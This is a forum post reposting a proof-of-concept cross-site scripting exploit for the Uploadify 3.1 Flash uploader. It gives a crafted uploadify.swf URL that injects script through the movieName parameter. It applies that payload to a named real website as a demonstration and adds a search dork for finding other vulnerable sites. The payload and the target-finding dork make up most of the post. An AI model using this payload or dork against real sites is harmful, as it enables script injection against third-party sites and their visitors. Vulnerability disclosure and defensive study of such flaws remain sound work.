Jump to content
Aerosol

Uploadify 3.1 Cross Site Scripting

Recommended Posts

Posted

# Affected software:
# Type of vulnerability:
# URL: http://www.uploadify.com/
# Discovered by: Provensec
# Website: http://www.provensec.com

#version 3.1
# Proof of concept

uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf


demo

http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf

dork:inurl:uploadify.swf ext:swf

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...